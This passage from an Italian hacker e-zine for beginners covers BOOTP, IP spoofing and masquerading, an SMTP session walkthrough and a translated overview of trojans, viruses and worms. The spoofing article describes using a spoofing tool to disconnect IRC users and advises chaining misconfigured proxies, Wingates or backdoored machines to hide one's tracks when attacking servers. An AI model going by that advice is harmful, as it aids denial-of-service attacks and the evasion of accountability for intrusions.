successiva ritrasmissione qualora anche quella precedente non abbia dato risposta, e cosi' via. Il protocollo BOOTP e' molto piu' veloce di quello RARP, e permette di fornire al richiedente un maggior numero di informazioni: non soltanto l' indirizzo IP, ma anche, per esempio l' indirizzo del gateway piu' vicino, l' indirizzo di un file server per la memorizzazione dei dati, la subnet mask e altre informazioni opzionali. Vediamo i vari campi in dettaglio. I primi tre campi corrispondono al tipo di messaggio se e' cioe' una richiesta bootrequest o una risposta bootreply, al tipo di interfaccia fisica e alla lunghezza dell' indirizzo fisico, come in RARP. Dato che BOOTP e' basato su UPD, abbiamo detto che il server che risponde alla richiesta potrebbe trovarsi anche su un' altra rete fisica. Il numero di salti che la richiesta fa' da una rete fisica all' altra prima di raggiungere il server che la gestira' viene memorizza qui'. Il campo successivo e' l' identificativo della transazione e permette di associare la risposta alla richiesta originale. Dei due campi seguenti, il primo riporta il numero di secondi passati da quando il client e' stato acceso, mentre il secondo non e' utilizzato. Da qui' in poi vengono i dati veri e propri. Se il client sta usando BOOTP per conoscere il proprio indirizzo IP, il primo campo di questo blocco sara' zero. Se invece la richiesta riguarda altre informazioni, il client memorizzera' qui' il proprio indirizzo IP. Il campo successivo conterra' l' indirizzo IP risolto dal server. Ovviamente quali campi siano riempiti e quali siano nulli dipende dal tipo di messagio. I due indirizzi IP successivi sono relativi al server BOOTP e al gateway piu' vicino. Da notare che il client puo' richiedere che sia un server ben preciso e non uno qualunque a rispondere alla sua richiesta. Questo puo' essere fatto specificando nella richiesta l' indirizzo IP o il nome del server preferito. Quest' ultima informazione segue immediatamente l' indirizzo fisico del richiedente. Il penultimo campo serve a contenere il nome di un file che a sua volta conterra' tutta una serie di informazioni di boot per il client. In pratica, quest' ultimo puo' chiedere al server di mandargli una vera e propria configurazione d' avvio. Per far cio', il client specifichera' un nome breve, una sorta di alias, che nella base dati del server corrispondera' a un file fisico memorizzato da qualche parte nella rete. Per esempio, se il client scrivera' "pcoffice" il server restituira' in quel campo /usr/boot/pc/office.cfg L' ultimo campo puo' contenere una lista di informazioni ulteriori che il client desidera ricevere dal server BOOTP. Il protocollo BOOTP e' molto importante, anche perche' su di esso si basa un' altro protocollo, molto attuale e utilizzato da chiunque si colleghi in rete via modem tramite un ISP, chiamato DHCP. Fine Darkman ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ IP SPOOFING & IP MASQUERADE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ----------------------------IP SPOOFING & IP MASQUERADE. ----------------------------Parimpampu' .. eccomi qua.. parimpampu' .. hihihi gioventu' bruciata ;o) ma chi lo sa .. ehmmm Allora ... ecco cosa successe un bel di' di febbraio mentre chattavo con una cara ragazza in IRC..(ehmm ..) Un certo NObodY88 (e chi cavolo e' che mi scoccia proprio ora che la tipa mi da' il num. di telefono? hihihi ;o))) mi chiama in query e mi dice: "Ti va di scrivere per Newbies?" "Orcalapeppa... io scrivere un articolo?? Ma... non ho le competenze necessarie, non conosco l'italiano... e poi .. che cavolo e' Newbies?" Pero'... pensa che ti ripensa, mi dico "perche' no" (hihihi) quindi mi butto e decido di scrivere qualcosa che cerchi di 'chiarirci' un po' le idee sull'IP spoofing e IP masquerade e di vedere in generale come funzionano (sperando che gli insulti che manderete non mi facciano fischiare le orecchie in eterno) Cosa sono? Cosa fanno? A che servono? 1 FIORINO!! (hihihi) Ehhmm Premetto che tutto quello che scrivero' .... non potra' essere usato contro di me.. perche' inteso a solo scopo (d)istruttivo. Mi posso solo assumere la responsabilita' di aver scritto eventualmente cagate (hihi ma nel caso, ditemelo con tatto... sono sensibile .. hihihi) .. non quella delle vostre azioni :o) Ok ciancio alle bande e iniziamo: ------------------*IP spoofing : ------------------Spesso si parla di IP Spoofato in modo errato; vi e' mai capitato, per esempio di chattare in IRC con qualcuno che diceva di avere l'IP spoofato? Ebbene quello in realta' non e' un IP spoofato ma mascherato. L'IP spoofing infatti non permette una comunicazione 'bilaterale', ma permette solo di inviare pacchetti senza ricevere risposte. Perche'? Vediamolo. L'IP spoofing e' una tecnica che consiste nell'inviare dei pacchetti opportunamente 'modificati' per far credere al destinatario, che gli stessi arrivino da tutt'altra parte e, quindi, per rendersi 'anonimi' (o meglio spacciarsi per qualcun altro) agli occhi della "vittima". Questo si ottiene modificando l'indirizzo IP sorgente (source IP) nell' header (intestazione) del pacchetto (datagramma IP). Che significa? Immaginiamo di avere una persona che, per un motivo o per un altro, non ci sia molto ... ehmm simpatica diciamo... anzi .. ci ispiri proprio una matta voglia di spedirgli qualche insulto... cosi'.. giusto per rendere meno monotona la vita. Pero'... non vogliamo che sappia chi gli manda gli insulti e abbiamo anche il dubbio che lui, vedendo una lettera provenire da noi, semplicemente la ignori... vanificando quindi il nostro scopo. Che facciamo allora? Prendiamo una bella lettera di insulti (fantasiosi mi raccomando) e la mettiamo in una busta (l'header del pacchetto) su cui pero' come mittente non metteremo il nostro indirizzo, ma ad esempio: "Nonna Peppa, Via della Misericordia 666 " (hihihi) Cosa succede a questo punto? Il destinatario riceve la lettera tranquillamente, giudicandola inoffensiva (pensa tra se e se "Ohhh una lettera da Nonna Peppa, che dolce, che carina!!) .... e invece nella lettera c'e' scritto qualcosa come: "@!*^'#" A questo punto il tipo si altera un pochino e decide di rispondere con una lettera altrettanto interessante... ma a chi inviera' la lettera? Sicuramente a Nonna Peppa, visto che a tutti gli effetti la lettera sembra provenire da lei. Capito quindi? Con questa tecnica non si puo' ottenere una comunicazione, semplicemente perche' il destinatario... non conosce il nostro indirizzo. Vi chiederete... ma allora a cosa puo' servire questa tecnica visto che non posso instaurare una comunicazione? E come posso modificare i pacchetti? Be' l'IP spoofing viene utilizzato per molti attacchi sia di tipo D.o.S. (Denial of Service, attacchi che possono mettere fuori uso, bloccare o rallentare il sistema momentaneamente... fastidioso ma non provoca danni gravi), sia per il tipico Hacking (attacchi molto piu' interessanti che possono permettere di guadagnare particolari accessi nei sistemi) e utilizzato sia in modo diretto (attaccando cioe' direttamente il sistema che riceve i pacchetti spoofati), sia in modo indiretto (sfruttando cioe' le risposte che la macchina destinataria dello spoof invia al presunto mittente). Gli attacchi D.o.S. che si possono realizzare cmq sono molti: dai vari flood (syn flood, rst flood) al click, al boink ecc. (eheh magari se ci sara' un seguito a quest'articolo .....) Oppure, se proprio si vuole avere la comunicazione bilaterale, si potrebbe tentare di instaurarla alla ceca, cercando di prevedere le varie risposte della vittima ai nostri pacchetti, e rispondendo a nostra volta in modo adeguato (assicurandoci pero' che l'IP da noi spoofato sia in quel momento irraggiungibile e non possa quindi rispondere anche lui alla vittima (che, sta inviando pacchetti all'indirizzo da noi spoofato). Uno schemino chiaro che riassume l'IP spoofing (e si trova su praticamente tutti i documenti che trattano IP spoofing), e' all'incirca questo: host A <---------------->X<--------------> host B | host S ---------------->/ in cui: noi siamo host S, il bersaglio del nostro attacco e' host B e il e l'indirizzo sorgente che metteremo nell'header dei pacchetti al posto del nostro, corrisponde al'indirizzo di host A Come si puo' realizzare lo spoofing? Be' per farvi un idea, un programma che lo realizza e che probabilmente avrete utilizzato qualche volta (hihihi Lameroni) e' il famoso Click della 7th sphere... che fa esattamente questo: Ipotizziamo un tipico attacco D.o.S. da lamer in IRC Secondo lo schemino che c'e' li sopra: se noi siamo host S e vogliamo disconnettere host B dal server IRC host A (un server a caso irc.tin.it hihihi) che facciamo? Impostiamo il Click con i giusti dati e scegliamo tra il modo client side oppure server side, quindi lanciamo l'attacco. Mettiamo di aver scelto l'attacco client side.... Succede che il Click comincia a mandare a host B pacchetti ICMP spoofati aventi come indirizzo sorgente host A (server IRC) e come contenuto una frase del tipo "Sono Esploso!!". ("host unreachable") Host B (vittima) a questo punto riceve questa 'lettera/pacchetto' proveniente da Host A (server IRC), legge il messaggio e realizza che host A (server IRC) e' esploso .. quindi pensa: "che cavolo ci rimango connesso a fare a un indirizzo di server che non c'e' piu' perche' e' esploso?" a questo punto si disconnette. L'attacco e' realizzato, host B e' disconnesso da IRC. Nel caso avessimo scelto il modo di attacco server side, il procedimento e' uguale ma i pacchetti vengono mandati a host A (server IRC) e provenienti da host B (vittima), quindi e' il server IRC che scollega host B credendolo 'esploso'. Questo e' solo un esempio di attacco (ora non iniziate a scollegare la gente solo per provare ;o)) In effetti, sfruttare appieno l'IP spoofing (anche per cercare di far qualcosa in piu' dei tipici D.o.S.), significa soprattutto potersi costruire i pacchetti da inviare, su misura.. a seconda del tipo di attacco che vogliamo realizzare. Questo risulta piu' facile da ottenere ad esempio su sistemi Linux che su Winzozz 9x, pero' per questi ultimi potreste utilizzare programmi appositi (ad esempio exploit generator) che funzionano abbastanza bene. Ok detto piu' o meno cos'e' l'IP spoofing e come funzia e capito che non si puo' utilizzare per nascondere il nostro IP in una comunicazione bilaterale, andiamo a vedere come si puo' fare a ottenere questo .. 'mascherando' e non 'spoofando' il nostro indirizzo IP. ---------------------*IP masquerade: ---------------------L'unico modo in effetti per avere un certo anonimato, e' far si che una macchina faccia da tramite (piu' o meno volentieri) tra noi e il bersaglio/vittima/destinatario. Immaginiamo di essere Gambadilegno che vuole insultare Topolino, ma vuole mantenere l'incognito (notoriamente, Topolino e Gambadilegno non vanno molto d'accordo). Allora andiamo da Pippo (Yuk) che un po' credulone lo e', e gli diciamo "va da Topolino, digli @#!^§ e fammi sapere cosa ti dice"; lui esegue, Topolino 'riceve l'insulto da Pippo e risponde a Pippo' il quale poi torna da Gambadilegno e gli dice "Ma che vuoi? io sono buono ma se continui fai una brutta fine", esattamente la frase che Topolino ha detto a Pippo. Ecco quindi che abbiamo comunicato con Topolino, facendo finta di essere Pippo. (tutto questo grazie al fatto che Pippo e' beotino ;o) Otteniamo quindi una cosa del tipo: host S <--> host A <--> host B in uno schema del genere noi siamo host S che spediamo pacchetti a host A (tramite) il quale li rimbalza a host B (vittima) mettendo pero' il proprio IP come sorgente ; a questo punto host B (vittima) vedra' i pacchetti inviati da noi come provenienti da host A (tramite), quindi rispondera' a host A il quale fara' di nuovo l'operazione che ha fatto prima .. cioe' rimbalzera' i pacchetti inviati da host B (vittima) a host S (noi) Cosa e' successo? E' successo che abbiamo ottenuto una comunicazione completa di risposta (bilaterale) in cui pero' la vittima non ha il nostro IP ma pensa di comunicare a tutti gli effetti con host A. Come facciamo? I metodi sono tanti... ce ne sono di piu' o meno 'legali' e piu' o meno efficaci .. tutto dipende da cio' che volete fare .. e dal perche' vi serve un IP mascherato. Ci sono macchine gia' predisposte a fare da tramite (non solo da tramite ma anche altre cose, ad esempio anche da buffer nel caso dei proxy) ad esempio tra una certa rete locale e 'La rete delle reti'. Le potremmo sfruttare a nostro vantaggio no? Proxy/firewall, Wingate, Stargate.. sono tutte macchine che possono fare al caso nostro e che, di solito dovrebbero autorizzare solo connessioni dal l'interno della rete che controllano -> all'esterno(internet) e dall'esterno della rete che controllano -> al suo interno. rete controllata dal proxy <-------->| proxy/firewall |<--------> internet Succede pero' ... che alle volte le macchine vengono configurate male e allora.. un proxy (per esempio) autorizza comunicazioni anche dall'esterno della rete locale che governa ... reindirizzate sempre all'esterno .(ecco il nostro Pippo beotino)... e quindi si comporta come un vero 'rimbalzino' (infatti stiamo realizzando un 'bouncing' :o) ) rete controllata dal proxy <-------->| proxy/firewall |<---------> internet | noi furboni <----------------------->/ E questo e' un metodo (un po' illegale :o)).Ma ce ne sono altri: ad esempio utilizzando una shell (legale o meno che sia) su qualche server, usando come tramite una macchina infetta da qualche backdoor che permette la reindirizzazione dei dati (avete presente il BO?), oppure usando dei Remailer, o dei Proxy di pubblico accesso (questi ultimi metodi sono legali ;o). Tutto in fin dei conti dipende da cosa volete fare: Volete mascherare il vostro IP (per motivi di protezione. non per essere anonimi se fate cavolate ;o)) mentre chattate in IRC o con ICQ o con qualche altro client che supporti i socks? Basta inserire negli appositi setup l'indirizzo IP di qualche proxy o wingate scoperto ed ecco l'IP mascherato (ma attenzione! Non siete protetti del tutto ;o) Volete navigare mantenendo l'anonimato? utilizzate i Remailer o inserite anche qui dei proxy (magari piu' di uno in catena per aumentare la sicurezza). Volete attaccare qualche server? Fate bouncing da una shell su piu' Wingate, Stargate ecc.... in catena per confondere le vostre tracce. Volete provare a penetrare la Nasa? Ehmm lasciate perdere ;o)) Be' .. in grandi linee funzia cosi' .. Se mi permetteranno di scrivere ancora... si potrebbero vedere alcuni tipi di attacco ... che sfruttano queste tecniche... certo sempre dal punto di vista di un newbies ;o)) 'Iauz Ramesse - (per insulti vari: [email protected]) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ SMTP ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Premetto che tutto quello che scrivo potrebbe essere smentito quindi aspettate che qualcuno dei guru (vero duke? eheheh) mi dica che e' tutto giusto se no... aspettatevi le correzioni sul 3ø numero. Allora comincio un po' da lontano x arrivare dritto al punto. <N0bodY88 SERIO MODE> Chi di voi non ha sentito parlare di Agent x la posta elettronica? Un agent e' un software speciale che svolge operazioni x una persona o un altro programma. Ci sono 2 casi diversi, pero', il primo e' l'UA (User Agent), un agente utente quindi, mentre il secondo, MTA (Message Transfer Protocol) e' un agente di tarsfe rimento messaggio (simili, no?). Dove pero' il primo e' un programma email, mentre il secondo e' un client o un programma server che svolge servizi di email,(quale ad esempio quello di spedire o ricevere email x un computer host). Per intenderci quindi UA lo sono ad esempio Eudora o Outlook Express, mentre l'MTA rappresenta il sistema di e-mail che si collega tramite il protocollo TCP con altri MTA col....SMTP :) L'SMTP (dalle iniziali di Simple Mail Transfer Protocol) permette una comunicazione quindi a doppio senso tra il client (locale) e il server (remoto). Il client MTA manda dei comandi al rispettivo server MTA, che a sua volta risponde mandando le risposte al client MTA. Da cio' si deduce che i comandi SMTP richiedono delle risposte. dal modulo di ricezione SMTP. Adesso provo a fare un esempio simile a quello contenuto nella RFC numero 821 </N0bodY88 SERIO MODE> premettendo prima dei comandi N0bodY88 e Picci [ eheheh ] : PS: metto davanti a ogni riga un nuemro cosi' da spiegare dopo dicendo alla linea x c'e questo, alla y quest'altro 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Picci : N0bodY88: Picci : N0bodY88: Picci : N0bodY88: Picci : N0bodY88: Picci : N0bodY88: Picci : N0bodY88: N0bodY88: N0bodY88: Picci : N0bodY88: Picci : 220 newbies.org Simple Mail Transfer Service Ready HELO staff.org 250 newbies.org MAIL FROM:<[email protected]> 250 OK RCPT TO:<[email protected]> 250 OK RCPT TO:<[email protected]> 550 No such user here DATA 354 Start mail input; end with <CRLF>.<CRLF> Ciao zero come va? e' un pakko che non ci sentiamo... ...etc. etc. etc. . 250 OK QUIT 221 newbies.org Service closing transmission channel 1 --> il msg e' quello che compare appena si stabilisce la connessione TCP, dato che il server MTA invia il codice di risposta 220. 2 --> HELO e' la prima cosa che bisogna dire, come quando si saluta qualcuno per la prima volta e si dice "Salve, sono Carcarlo Pravettoni" allo stesso modo bisogna usare HELO coi server MTA 3 --> dopo che ci siamo "identificati" riceviamo la risposta del server, che ci da' in questo modo l'ok x cominciare la transazione mail 4 --> con MAIL FROM (spero l'abbiate capito) si dice al server "questa lettera la mando io che ho come e-mail [email protected]" quindi dovete mettere la vs mail, ovviamente non se state mandando una lettera anonima o fake, meglio specificare eheheheh 5 --> il server MTA ci da' l'ok con il quale conferma che ha capito il comando 6 --> RCPT TO viene passato al server con il nome del destinatario o dei destinatari della e-mail, e se il comando e' scritto giusto e il server trova un utente con relativa casella email sul server newbies.org allora da un codice risposta d'ok 250 7 --> il server MTA risponde "va tutto bene" a modo suo col codice risposta 250 8 --> RCPT TO viene passato al server con il nome del destinatario o dei destinatari della e-mail, e se il comando e' scritto giusto e il server trova un utente con relativa casella email sul server newbies.org allora da un codice risposta d'ok 250 9 --> il server MTA risponde con un codice di errore 550 xche' non esiste un utente 'inesistente' sul server newbies.org e quindi non ci sara' neanche una email... 10 -> con DATA si dice al server MTA "comincia a prendere appunti che sto per scrivere la mia mail" 11 -> il server MTA manda al client MTA il codice risposta 354 che significa "guarda che io sono pronto comincia pure a scrivere" e in piu' ti dice anke che x concludere la mail devi andare a capo, scrivere solo un punto e ridare invio x dire "ho finito la mia mail, adesso esci" 14 -> il punto non e' necessario...e' + che necessario, tant'e' che se non lo scrivete scrivete all'infinito al vs amico che finche' non uscite non ricevera' niente (tra le altre cose carine che accdaono se non mettete il punto eheheheheh) 15 -> il server MTA ci dice se ha capito (250) oppure se abbiamo commesso errori 16 -> con il comando QUIT diciamo al server "ue io devo andare che se no perdo l'autobus e non mi incontro con la mia tipa" e quindi terminiamo la transazione mail, xche' se non specifichaimo QUIT dal ns client MTA l'SMTP si incacchia e vi dice "guarda che si saluta pezzo di m..aleducato che non 6 altro!". 17 -> il server MTA vi dice che chiude la trasmissione e vi dice "ciao a presto" 18 -> non controllate...non c'e' una riga 18...hihihihi Concludo riportando alcuni codici risposta SMTP con relative descrizioni (fatte da me e quindi NON fidatevi troppo...): 211 214 220 221 250 251 354 421 450 451 452 500 501 502 503 504 550 551 552 553 554 |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ |--¯ risposta a un help di sistema messaggio di help servizio pronto il server sta chiudendo ils ervizio di trasmissione richiesta okki, completa e accettata :) utente non locale; termina con <CRLF>.<CRLF> avvia inserimento della tua e-mail; termina con <CRLF>.<CRLF> servizio non disponibile, chiusura del canale di trasmissione azione mail richiesta non eseguita; casella e-mail non disponibile azione richiesta eliminata; errore locale nella procedura azione richiesta non eseguita; sistema di memorizzazione insufficiente errore di sintassi, comando non riconosciuto errore di sintassi nei parametri o argomenti comando non attuato sbagliata sequenza di comandi parametro di comando non attuato azione richiesta non eseguita; casella postale non disponibile utente locale azione di mail richiesta eliminata; esaurito spazio memoria azione richiesta non eseguita; nome della casella postale non concesso operazione non riuscita Per ulteriori info sul SMTP consultate le RFC (Request For Comments) 821 e 1123. Byez at all N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°ÛÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛ°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛÛ°ÛÛ°°°ÛÛ°ÛÛ°°°² ²°°°°°ÛÛÛ°°°°ÛÛ²²²ÛÛ°°°°ÛÛÛ°°°°Û²ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛÛ°°ÛÛ°ÛÛ²²ÛÛ°ÛÛÛ°°ÛÛ°°°°°°² ²°°°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛ°°°ÛÛ²ÛÛ°°°Û²²ÛÛ°ÛÛ°°ÛÛ°°°°ÛÛÛ°°°°ÛÛ°ÛÛ²²ÛÛ°ÛÛÛÛ°ÛÛ°ÛÛ°°°² ²°°°°°ÛÛÛ°°°°ÛÛ°°Û°°°°ÛÛÛÛÛÛÛ°°Û²ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°°°°ÛÛ°ÛÛ²²ÛÛ°ÛÛ°ÛÛÛÛ°ÛÛ°°°² ²°°°°°ÛÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°°°°°ÛÛ°ÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛÛ°ÛÛ°°ÛÛÛ°ÛÛ°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ TROJAN HORSES, VIRUSES AND WORMS (tradotto da Wurz) ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Le cose in cui andiamo a sbattere nella Rete Questo e' un breve sguardo a qualcuno dei piu' pittoreschi personaggi nel serraglio delle minacce alla sicurezza in rete, con un'enfasi su come sono in relazione con i sistemi agent-based. Il gruppo Sistemi di Distribuzione di Massa alla IBM Research ha condotto ricerche in queste ed in altre cose emergenti riguardo ai sistemi di distribuzione del futuro. ---------------------------------------------------------------------------Trojan horses [cavalli di Troia] Un Trojan e' un programma che fa qualcosa che il programmatore vuole, ma che l'utente non approverebbe se lo sapesse prima. Poiche' molti sistemi di sicurezza correnti sono basati principalmente su privilegi user-level piuttosto che su privilegi program-level, qualsiasi programma che TU puoi lanciare puo' leggere qualsiasi cosa cui TU hai accesso in lettura, scrivere su qualsiasi cosa cui TU hai accesso in scrittura, ed eseguire qualsiasi programma o comando che TU sei autorizzato ad eseguire. Un Trojan nascosto in un qualsiasi programma di gioco scaricato dal tuo newsgroup preferito puo' leggere qualsiasi file su cui hai accesso, e spedirlo ovunque nel mondo. Puo' cancellare o introdurre qualche byte nei file su cui puoi scrivere. Puo' mandare messaggi osceni alla Casa Bianca, o postare cose imbarazzanti a dei newsgroup a caso. E puo' copiare se stesso in qualsiasi programma su cui hai accessi in scrittura (vedi Viruses & Worms piu' sotto). In un sistema mobile-agent, e' critico assicurare che gli agents siano eseguiti in un ambiente controllato, e che siano capaci di fare solo cose che sono stati autorizzati a fare. Gli agents devono essere fidati solo per quello che la meno fidata entita' possa essere capace di alterare il programma o lo stato interno dell'agent. ---------------------------------------------------------------------------Viruses and Worms Un virus e' un programma (di solito un trojan) che si diffonde, facendo copie di se stesso in un modo o nell'altro. Nell'ambiente dei microcomputer, i virus generalmente si diffondono scrivendo copie di se stessi in altri programmi, o nei boot records di dischi e dischetti. (Per maggiori informazioni sui virus nei PC compatibili, guarda all'IBM Computer Virus Information Center) Un worm in un ambiente di rete e' generalmente un programma autosufficiente che si diffonde generando copie di se stesso in altri ospiti nella rete. Un famoso worm ha causato grande scompiglio su Internet nel 1988. Non c'e' grande differenza tra virus e worm; in generale, se l'entita' diffondentesi e' un programma autosufficiente, sara' chiamato worm, mentre se si nasconde dentro altri programmi o codici boot sara' chiamato virus. Puo' un virus diffondersi tra gli agents in un sistema mobile-agent? Finora sembra che non ci sia nessuna ragione particolare per permettere ad un agent di alterare il codice di un altro agent gia' esistente. Se l'infrastruttura dell'agent non lo permette, nessun virus sarebbe capace di diffondersi da un agent all'altro. D'altra parte, se per caso o apposta l'infrastruttura permette ad un agent di alterarne un altro, sarebbero possibili i virus inter-agent. Sono possibili i worms nei sistemi mobile-agent? Se un agent puo' crearne un altro, esiste la possibilita' di scatenare una riproduzione worm. La riproduzione di agent deve essere controllata in un modo o nell'altro, per limitarne la possibilita'; se gli agents possono creare altri agents, devono essere affidati ad una distribuzione povera, o limitati in quanto grande possa essere la loro discendenza, o altrimenti potranno avere figli e nipoti senza alcun limite. ---------------------------------------------------------------------------Flash Crowds Il termine flash crowd e' stato inizialmente usato da Larry Niven, in un breve racconto fantascientifico. Nella storia, il teletrasporto locale economico e' divenuto possibile; ora, i siti con attraenti nuove storie sono istantaneamente inondati da ficcanaso teletrasportatisi. Come i sistemi divengono piu' interconnessi e piu' potenti, abbiamo l'equivalente del teletrasporto economico; se un sito Web e' riconosciuto come particolarmente interessante, la sua curva di contatti puo' divenire esponenziale, causando strozzature della rete e crash dei server. In una rete di agents, un vasto numero di agents similmente programmati, come un orda di programmi di mercato similmente programmati puo' causare un crash dei mercati, cosi' possono causare congestione di rete e sovraccarico dei server. E se tutti gli agents adottano simili strategie di ripiego in caso di sovraccarico, la flash crowd puo' migrare da server a server sulla rete, portando ad impetuosi sovraccarichi di difficile rimedio. ---------------------------------------------------------------------------Weeds, Freeloaders, Flying Dutchmen e Zombies Un weed [erbaccia] e' un programma (o qualsiasi altro in un sistema) che non fa niente di male, e che usa una cosi' piccola quantita' di risorse che non ci da' fastidio. In seguito pero' comincia ad accumularsi, e bisogna usare le forbici. O l'erbicida. Un freeloader e' un programma che, per sopravvivere e possibilmente aiutare il suo creatore, usa le risorse di un sistema o di un server senza pagarle. I server possono fornire dei servizi minimi gratis per attirare dei clienti o, non intenzionalmente, come effetto non voluto di complesse strutture di prezzo; ci possono essere molti modi per fare in modo che molti addebiti, specialmente quelli piccoli, si perdano nel casino. Un freeloader sfrutta queste cose per operare senza pagare. Chiamato come il leggendario vascello fantasma, un Flying Dutchman [olandese volante] e' un freeloader che riesce a diventare veramente immortale, senza pagare per le risorse necessarie a sopravvivere. Un Flying Dutchman puo' muoversi da un ospite all'altro, senza mai usare abbastanza risorse da essere ucciso; puo' generare una copia di se stesso in un altro ospite proprio prima di essere terminato, assicurando una discendenza senza fine. Uno Zombie e' simile al Flying Dutchman; e' un programma che e' stato terminato, ma continua lo stesso a consumare risorse, a causa di ritardi (qualche volta infiniti) nel pulire tutte le risorse associate ad esso. Gli zombies possono talvolta avere abbastanza risorse per una vera elaborazione; piu' spesso, esistono solo come i non-morti proprietari di vario tipo di spazio. Un singolo programma freeloader o immortale in se' non danneggia un sistema, ed anticipiamo che un tipico sistema agent-based puo' tollerare un basso livello di freeloading. Come analogia ai negozi fisici, che tollerano un certo numero di persone venute a ripararsi dalla pioggia, nella speranza che possano eventualmente comprare qualcosa. Incontrollati, un gran numero di weeds possono sprecare grandi quantita' di risorse di sistema; i sistemi hanno il bisogno di monitorare quest'attivita', e di imporre l'ordine se sfugge al controllo. Richieste da conosciuti freeloaders possono essere fatte pagare, perfino in caso siano normalmente gratuite. Un processo di monitoraggio intelligente puo' essere necessario per identificare e terminare programmi immortali, intenzionali od occasionali, che non abbiano alcuno scopo utile. Altri tipi di weeds richiedono indubbiamente altri tipi di soluzioni; l'inaspettato e' piacevole. ---------------------------------------------------------------------------I soliti sospetti Cosi' come queste nuove e in qualche modo speculative minacce, molti dei problemi di sicurezza tradizionali, come controllo di accesso basico, autenticazione, crittazione sicura, ecc., si applicano alla sicurezza della rete e degli agent: IBM Research ha molti altri progetti relativi alla sicurezza. ---------------------------------------------------------------------------David Chess, [email protected] Thanks to Gene Spafford at Purdue, whose talk "Viruses, Worms, and Things that go Bump in the Net" may have inspired the title for this page; tricky things, replicators! [tradotto da WURZ] NOTA DI N0bodY88 = diamo un benvenuto al NewBies Staff al primo tarduttore di sempre del nostro Staff, in questo "capitolo" appariranno ogni mese le sue traduzioni, o i suoi articoli, a seconda di come scegliera' di andare avanti :) PS: un tnx da parte di tutti quelli che l'inglese x intanto non se lo vogliono studiare o che lo studiano ma hanno qualke problemino, tnx 1000 Wurz!!! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 